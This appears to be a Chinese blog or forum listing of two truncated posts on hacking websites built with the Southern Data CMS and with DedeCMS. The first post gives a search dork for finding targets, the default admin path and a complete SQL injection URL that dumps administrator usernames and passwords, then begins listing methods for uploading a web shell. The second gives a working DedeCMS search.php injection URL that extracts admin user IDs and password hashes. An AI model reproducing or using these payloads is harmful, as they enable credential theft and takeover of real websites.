-
南方数据网站漏洞
漏洞影响版本 v10.0 v11.0 关键字:inurl:”HomeMarket.asp” 默认后台:/admin 直接爆用户密码: http://www.xxx.com/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20”=’ 拿shell方法貌似有4种: 1、注册用户上传拿shell,这...阅读全文阅读全文
-
入侵dedecms站 找后台的一些小经验分享
首先: 注入exp 有时候 有些 /plus/目录换成了 /plugins目录 /plugins/search.php?keyword=as&typeArr[111%3D@`\’`) +UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+ from+`%23@__admin`%23@`\’`+]=a /plus/search.php?keyword=as&typeArr[111%3D@`\...阅读全文